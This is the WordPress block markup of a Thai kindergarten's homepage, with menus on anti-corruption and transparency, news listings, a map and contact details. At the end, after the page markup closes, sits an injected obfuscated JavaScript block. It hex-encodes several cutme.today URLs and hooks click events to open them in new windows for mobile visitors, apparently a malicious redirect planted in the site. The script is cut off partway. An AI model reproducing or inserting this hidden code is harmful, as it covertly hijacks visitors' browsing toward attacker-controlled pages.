{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n\n<!-- wp:cover {\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\",\"id\":200,\"dimRatio\":50,\"style\":{\"color\":{}}} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"></span><img class=\"wp-block-cover__image-background wp-image-200\" alt=\"\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" data-object-fit=\"cover\"/><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\">แบบวัดการรับรู้ EIT 2</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 